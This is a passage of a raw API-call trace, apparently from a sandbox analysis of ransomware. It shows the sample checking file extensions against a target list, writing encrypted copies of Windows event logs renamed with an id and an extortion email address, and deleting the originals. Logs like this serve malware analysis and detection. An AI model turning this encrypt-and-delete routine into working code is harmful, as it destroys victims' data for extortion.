lpString2="evtx") returned -1 [0068.745] lstrlenW (lpString=".rar") returned 4 [0068.745] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.745] lstrlenW (lpString=".bz2") returned 4 [0068.745] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.745] lstrlenW (lpString=".7z") returned 3 [0068.745] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.745] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0068.745] lstrlenW (lpString=".dbf") returned 4 [0068.745] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.745] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0068.745] lstrlenW (lpString=".1cd") returned 4 [0068.745] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.745] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0068.745] lstrlenW (lpString=".jpg") returned 4 [0068.745] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.745] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0068.745] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0068.745] lstrlenW (lpString=".doc") returned 4 [0068.745] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.745] lstrlenW (lpString=".docx") returned 5 [0068.745] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.745] lstrlenW (lpString=".pdf") returned 4 [0068.745] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.745] lstrlenW (lpString=".xls") returned 4 [0068.745] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.745] lstrlenW (lpString=".xlsx") returned 5 [0068.745] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.745] lstrlenW (lpString=".ppt") returned 4 [0068.745] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.745] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0068.745] lstrlenW (lpString=".zip") returned 4 [0068.745] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.745] lstrlenW (lpString=".rar") returned 4 [0068.746] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.746] lstrlenW (lpString=".bz2") returned 4 [0068.746] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.746] lstrlenW (lpString=".7z") returned 3 [0068.746] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.746] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0068.746] lstrlenW (lpString=".dbf") returned 4 [0068.746] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.746] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0068.746] lstrlenW (lpString=".1cd") returned 4 [0068.746] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.746] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0068.746] lstrlenW (lpString=".jpg") returned 4 [0068.746] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.746] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.746] lstrlenW (lpString="Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 49 [0068.746] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0068.746] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=69632) returned 1 [0068.746] CloseHandle (hObject=0x37c) returned 1 [0068.746] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx")) returned 0x20 [0068.746] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.747] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0068.747] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.747] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.747] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0068.747] GetLastError () returned 0x0 [0068.747] ReadFile (in: hFile=0x37c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x11000, lpOverlapped=0x0) returned 1 [0068.751] WriteFile (in: hFile=0x2c0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x11010, lpOverlapped=0x0) returned 1 [0068.753] ReadFile (in: hFile=0x37c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.753] WriteFile (in: hFile=0x2c0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x136, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x136, lpOverlapped=0x0) returned 1 [0068.753] SetEndOfFile (hFile=0x2c0) returned 1 [0068.753] CloseHandle (hObject=0x2c0) returned 1 [0068.753] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.753] SetEndOfFile (hFile=0x37c) returned 1 [0068.754] CloseHandle (hObject=0x37c) returned 1 [0068.754] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.755] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx")) returned 1 [0068.755] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0068.755] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0068.755] lstrlenW (lpString=".doc") returned 4 [0068.755] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.755] lstrlenW (lpString=".docx") returned 5 [0068.755] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.755] lstrlenW (lpString=".pdf") returned 4 [0068.755] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.755] lstrlenW (lpString=".xls") returned 4 [0068.755] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.755] lstrlenW (lpString=".xlsx") returned 5 [0068.755] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.755] lstrlenW (lpString=".ppt") returned 4 [0068.755] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.755] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0068.755] lstrlenW (lpString=".zip") returned 4 [0068.755] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.755] lstrlenW (lpString=".rar") returned 4 [0068.755] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.755] lstrlenW (lpString=".bz2") returned 4 [0068.755] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.755] lstrlenW (lpString=".7z") returned 3 [0068.755] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.755] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0068.755] lstrlenW (lpString=".dbf") returned 4 [0068.755] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.756] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0068.756] lstrlenW (lpString=".1cd") returned 4 [0068.756] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.756] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0068.756] lstrlenW (lpString=".jpg") returned 4 [0068.756] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.756] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0068.756] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0068.756] lstrlenW (lpString=".doc") returned 4 [0068.756] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.756] lstrlenW (lpString=".docx") returned 5 [0068.756] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.756] lstrlenW (lpString=".pdf") returned 4 [0068.756] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.756] lstrlenW (lpString=".xls") returned 4 [0068.756] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.756] lstrlenW (lpString=".xlsx") returned 5 [0068.756] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.756] lstrlenW (lpString=".ppt") returned 4 [0068.756] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.756] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0068.756] lstrlenW (lpString=".zip") returned 4 [0068.756] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.756] lstrlenW (lpString=".rar") returned 4 [0068.756] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.756] lstrlenW (lpString=".bz2") returned 4 [0068.756] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.756] lstrlenW (lpString=".7z") returned 3 [0068.756] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.756] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0068.756] lstrlenW (lpString=".dbf") returned 4 [0068.757] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.757] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0068.757] lstrlenW (lpString=".1cd") returned 4 [0068.757] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.757] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0068.757] lstrlenW (lpString=".jpg") returned 4 [0068.757] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.757] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.757] lstrlenW (lpString="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 66 [0068.757] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0068.757] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=69632) returned 1 [0068.757] CloseHandle (hObject=0x37c) returned 1 [0068.757] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx")) returned 0x20 [0068.757] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.757] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0068.758] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.758] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.758] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0068.758] GetLastError () returned 0x0 [0068.758] ReadFile (in: hFile=0x37c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x11000, lpOverlapped=0x0) returned 1 [0068.760] WriteFile (in: hFile=0x2c0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x11010, lpOverlapped=0x0) returned 1 [0068.762] ReadFile (in: hFile=0x37c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.762] WriteFile (in: hFile=0x2c0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x158, lpOverlapped=0x0) returned 1 [0068.762] SetEndOfFile (hFile=0x2c0) returned 1 [0068.762] CloseHandle (hObject=0x2c0) returned 1 [0068.762] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.762] SetEndOfFile (hFile=0x37c) returned 1 [0068.763] CloseHandle (hObject=0x37c) returned 1 [0068.763] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.763] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx")) returned 1 [0068.764] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0068.764] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0068.764] lstrlenW (lpString=".doc") returned 4 [0068.764] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.764] lstrlenW (lpString=".docx") returned 5 [0068.764] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.764] lstrlenW (lpString=".pdf") returned 4 [0068.764] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.764] lstrlenW (lpString=".xls") returned 4 [0068.764] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.764] lstrlenW (lpString=".xlsx") returned 5 [0068.764] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.764] lstrlenW (lpString=".ppt") returned 4 [0068.764] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.764] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0068.764] lstrlenW (lpString=".zip") returned 4 [0068.764] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.764] lstrlenW (lpString=".rar") returned 4 [0068.764] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.764] lstrlenW (lpString=".bz2") returned 4 [0068.764] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.764] lstrlenW (lpString=".7z") returned 3 [0068.764] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.764] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0068.764] lstrlenW (lpString=".dbf") returned 4 [0068.764] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.765] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0068.765] lstrlenW (lpString=".1cd") returned 4 [0068.765] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.765] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0068.765] lstrlenW (lpString=".jpg") returned 4 [0068.765] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.765] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0068.765] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0068.765] lstrlenW (lpString=".doc") returned 4 [0068.765] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.765] lstrlenW (lpString=".docx") returned 5 [0068.765] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.765] lstrlenW (lpString=".pdf") returned 4 [0068.765] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.765] lstrlenW (lpString=".xls") returned 4 [0068.765] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.765] lstrlenW (lpString=".xlsx") returned 5 [0068.765] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.765] lstrlenW (lpString=".ppt") returned 4 [0068.765] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.765] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0068.765] lstrlenW (lpString=".zip") returned 4 [0068.765] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.765] lstrlenW (lpString=".rar") returned 4 [0068.765] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.765] lstrlenW (lpString=".bz2") returned 4 [0068.765] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.765] lstrlenW (lpString=".7z") returned 3 [0068.765] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.765] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0068.765] lstrlenW (lpString=".dbf") returned 4 [0068.766] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.766] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0068.766] lstrlenW (lpString=".1cd") returned 4 [0068.766] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.766] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0068.766] lstrlenW (lpString=".jpg") returned 4 [0068.766] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.766] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.766] lstrlenW (lpString="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 72 [0068.766] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0068.766] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=69632) returned 1 [0068.766] CloseHandle (hObject=0x37c) returned 1 [0068.766] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx")) returned 0x20 [0068.766] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.766] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0068.767] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.767] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.767] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0068.767] GetLastError () returned 0x0 [0068.767] ReadFile (in: hFile=0x37c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x11000, lpOverlapped=0x0) returned 1 [0069.421] WriteFile (in: hFile=0x2c0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x11010, lpOverlapped=0x0) returned 1 [0069.423] ReadFile (in: hFile=0x37c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.423] WriteFile (in: hFile=0x2c0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x164, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x164, lpOverlapped=0x0) returned 1 [0069.423] SetEndOfFile (hFile=0x2c0) returned 1 [0069.423] CloseHandle (hObject=0x2c0) returned 1 [0069.423] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.424] SetEndOfFile (hFile=0x37c) returned 1 [0069.425] CloseHandle (hObject=0x37c) returned 1 [0069.425] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0069.425] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx")) returned 1 [0069.425] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0069.425] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0069.425] lstrlenW (lpString=".doc") returned 4 [0069.425] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0069.425] lstrlenW (lpString=".docx") returned 5 [0069.425] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0069.425] lstrlenW (lpString=".pdf") returned 4 [0069.425] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0069.425] lstrlenW (lpString=".xls") returned 4 [0069.425] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0069.425] lstrlenW (lpString=".xlsx") returned 5 [0069.425] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0069.425] lstrlenW (lpString=".ppt") returned 4 [0069.425] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0069.425] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0069.425] lstrlenW (lpString=".zip") returned 4 [0069.425] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0069.425] lstrlenW (lpString=".rar") returned 4 [0069.425] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0069.425] lstrlenW (lpString=".bz2") returned 4 [0069.426] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0069.426] lstrlenW (lpString=".7z") returned 3 [0069.426] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0069.426] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0069.426] lstrlenW (lpString=".dbf") returned 4 [0069.426] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0069.426] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0069.426] lstrlenW (lpString=".1cd") returned 4 [0069.426] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0069.426] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0069.426] lstrlenW (lpString=".jpg") returned 4 [0069.426] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0069.426] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0069.426] lstrlenW 